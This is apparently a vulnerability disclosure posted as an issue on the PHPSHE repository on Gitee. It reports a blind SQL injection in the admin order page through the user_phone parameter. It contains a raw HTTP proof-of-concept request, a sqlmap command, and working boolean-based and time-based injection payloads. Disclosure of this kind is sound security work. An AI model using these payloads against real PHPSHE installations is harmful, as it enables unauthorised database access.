I found a blind SQL injection in the background

1.admin index.php
![index](https://images.gitee.com/uploads/images/2018/1226/143421_bd4235cc_3028219.png "图片1.png")

2.vulnerability point 
![point](https://images.gitee.com/uploads/images/2018/1226/143451_7e1c2474_3028219.png "图片2.png")

3.code 
![code](https://images.gitee.com/uploads/images/2018/1226/143513_1ca7b1fe_3028219.png "图片5.png")

4.capture the cap
![cap](https://images.gitee.com/uploads/images/2018/1226/143540_a76f6bda_3028219.png "图片3.png")

5.sql injection test
![test](https://images.gitee.com/uploads/images/2018/1226/143604_71b71f2a_3028219.png "图片4.png")

poc:
```
GET /phpshe/admin.php?mod=order&state=&id=1&user_tname=1&user_phone=1&date1=2018-12-26&date2= HTTP/1.1
Host: 192.3.221.177
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.3.221.177/phpshe/admin.php?mod=order
Cookie: deviceid=1545098043964; PHPSESSID=d7860vsq3q03c2pvmvc798tt64
Connection: close
```

sqlmap command:
`Python sqlmap.py -r  1.txt --level=3 --risk=2 --dbms=mysql --batch -p "user_phone"`

injection type:

```
---
Parameter: user_phone (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
 clause
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' RLIKE (SELECT (CAS
E WHEN (4784=4784) THEN 1 ELSE 0x28 END))-- EfBd&date1=2018-12-26&date2=

Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mod=order&state=&id=1&user_tname=1&user_phone=1' AND (SELECT * FROM
 (SELECT(SLEEP(5)))hxbT)-- YEPD&date1=2018-12-26&date2=
---
```

koyshe/phpshe

内容风险标识

评论 (0)

koyshe/phpshe .gitee-modal { width: 500px !important; }

内容风险标识